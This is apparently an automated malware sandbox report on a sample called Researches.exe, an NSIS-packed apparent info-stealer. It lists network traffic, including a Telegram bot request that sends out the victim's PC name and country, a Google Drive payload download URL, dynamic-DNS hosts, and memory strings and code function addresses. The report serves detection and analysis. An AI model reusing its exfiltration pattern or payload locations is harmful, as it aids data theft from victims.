Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2020/02/2025%20/%2004:19:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 19:36:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Researches.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Researches.exe, 0000000B.00000002.3541070923.00000000337E1000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.00000000337D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Researches.exe, 0000000B.00000002.3541070923.00000000337E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enT
Source: Researches.exe, 0000000B.00000002.3541070923.00000000337DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Researches.exe, 0000000B.00000002.3519987420.000000000315C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Researches.exe, 0000000B.00000002.3519987420.000000000315C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/-40f1-ac21-573d1d5ce43f
Source: Researches.exe, 0000000B.00000002.3519951277.0000000003100000.00000004.00001000.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3519987420.0000000003182000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs
Source: Researches.exe, 0000000B.00000002.3519987420.0000000003182000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs-
Source: Researches.exe, 0000000B.00000002.3519987420.000000000315C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/y
Source: Researches.exe, 0000000B.00000003.3010057764.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3035966204.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3519987420.00000000031AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3010057764.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3035966204.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3519987420.00000000031AF000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3519987420.000000000319F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs&export=download
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Researches.exe, 0000000B.00000002.3541070923.000000003370B000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.000000003369B000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Researches.exe, 0000000B.00000002.3541070923.000000003369B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Researches.exe, 0000000B.00000002.3541070923.000000003370B000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.00000000336C5000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.0000000033731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034956000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.0000000034671000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3542593423.00000000347E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Researches.exe, 0000000B.00000003.3002891267.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, Researches.exe, 0000000B.00000003.3002949182.00000000031B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033812000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.0000000033803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Researches.exe, 0000000B.00000002.3541070923.0000000033812000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/T
Source: Researches.exe, 0000000B.00000002.3541070923.000000003380D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 57279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57279
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57274
Source: unknown	Network traffic detected: HTTP traffic on port 57266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57270
Source: unknown	Network traffic detected: HTTP traffic on port 57268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57260
Source: unknown	Network traffic detected: HTTP traffic on port 57263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57261 -> 443

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.6:57260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:57261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:57279 version: TLS 1.2

Source: C:\Users\user\Desktop\Researches.exe

Code function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405295

Source: C:\Users\user\Desktop\Researches.exe	Code function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_0040331C
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		11_2_0040331C

Source: C:\Users\user\Desktop\Researches.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe	Code function: 0_2_00404AD2	0_2_00404AD2
Source: C:\Users\user\Desktop\Researches.exe	Code function: 0_2_004064F7	0_2_004064F7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_00404AD2	11_2_00404AD2
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_004064F7	11_2_004064F7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2D288	11_2_02D2D288
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D25380	11_2_02D25380
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2A088	11_2_02D2A088
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2C148	11_2_02D2C148
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D276F1	11_2_02D276F1
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2F62F	11_2_02D2F62F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2C748	11_2_02D2C748
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D26498	11_2_02D26498
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2C478	11_2_02D2C478
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2CA18	11_2_02D2CA18
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2E988	11_2_02D2E988
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D269B0	11_2_02D269B0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2CFB8	11_2_02D2CFB8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2CCE8	11_2_02D2CCE8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2D278	11_2_02D2D278
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2537F	11_2_02D2537F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2C738	11_2_02D2C738
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2C468	11_2_02D2C468
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D23AA1	11_2_02D23AA1
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2CA08	11_2_02D2CA08
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D229EC	11_2_02D229EC
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D239ED	11_2_02D239ED
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2E987	11_2_02D2E987
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2CFB7	11_2_02D2CFB7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2CCE7	11_2_02D2CCE7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36633A50	11_2_36633A50
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36634A88	11_2_36634A88
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_366323D0	11_2_366323D0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36638FA8	11_2_36638FA8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36631850	11_2_36631850
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663F8F8	11_2_3663F8F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36634A78	11_2_36634A78
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663DE20	11_2_3663DE20
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36638600	11_2_36638600
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663DE10	11_2_3663DE10
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663E6E9	11_2_3663E6E9
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663E6F8	11_2_3663E6F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_366396CD	11_2_366396CD
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_366396D0	11_2_366396D0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663E2A0	11_2_3663E2A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663E290	11_2_3663E290
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663EB41	11_2_3663EB41
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663CB48	11_2_3663CB48
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663EB50	11_2_3663EB50
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663CB58	11_2_3663CB58
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36630B20	11_2_36630B20
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36630B30	11_2_36630B30
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663C700	11_2_3663C700
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663EFE8	11_2_3663EFE8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663CFF9	11_2_3663CFF9
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663EFF8	11_2_3663EFF8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_366323C0	11_2_366323C0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36631841	11_2_36631841
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36630040	11_2_36630040
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663F44F	11_2_3663F44F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663F450	11_2_3663F450
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36630023	11_2_36630023
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663D000	11_2_3663D000
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663F8E9	11_2_3663F8E9
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663D548	11_2_3663D548
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663D538	11_2_3663D538
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663D9A0	11_2_3663D9A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3663D991	11_2_3663D991
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36821E40	11_2_36821E40
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368217E8	11_2_368217E8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36822C20	11_2_36822C20
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682A1B0	11_2_3682A1B0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682CA88	11_2_3682CA88
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36821290	11_2_36821290
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368212A0	11_2_368212A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682AABF	11_2_3682AABF
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36828ACF	11_2_36828ACF
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682AAD0	11_2_3682AAD0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36826ADF	11_2_36826ADF
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36828AE0	11_2_36828AE0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36826AF0	11_2_36826AF0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682A631	11_2_3682A631
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682863F	11_2_3682863F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682A640	11_2_3682A640
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36826650	11_2_36826650
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36828650	11_2_36828650
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36826660	11_2_36826660
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682CA79	11_2_3682CA79
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36824F80	11_2_36824F80
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36826F80	11_2_36826F80
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36824F90	11_2_36824F90
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682D398	11_2_3682D398
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682EBA1	11_2_3682EBA1
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682D3A8	11_2_3682D3A8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682EBB0	11_2_3682EBB0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682B3E0	11_2_3682B3E0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368217E7	11_2_368217E7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682B3F0	11_2_3682B3F0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368293F0	11_2_368293F0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682CF07	11_2_3682CF07
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682E710	11_2_3682E710
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682CF18	11_2_3682CF18
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682E720	11_2_3682E720
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682AF51	11_2_3682AF51
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682AF60	11_2_3682AF60
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36828F61	11_2_36828F61
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36826F70	11_2_36826F70
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36828F70	11_2_36828F70
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36829880	11_2_36829880
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36829890	11_2_36829890
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36827890	11_2_36827890
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368258A0	11_2_368258A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368278A0	11_2_368278A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368258B0	11_2_368258B0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682DCB7	11_2_3682DCB7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682F4C0	11_2_3682F4C0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682BCC7	11_2_3682BCC7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682DCC8	11_2_3682DCC8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682F4D0	11_2_3682F4D0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682BCD8	11_2_3682BCD8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36829400	11_2_36829400
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36822C0F	11_2_36822C0F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682540F	11_2_3682540F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682740C	11_2_3682740C
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36820013	11_2_36820013
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36827410	11_2_36827410
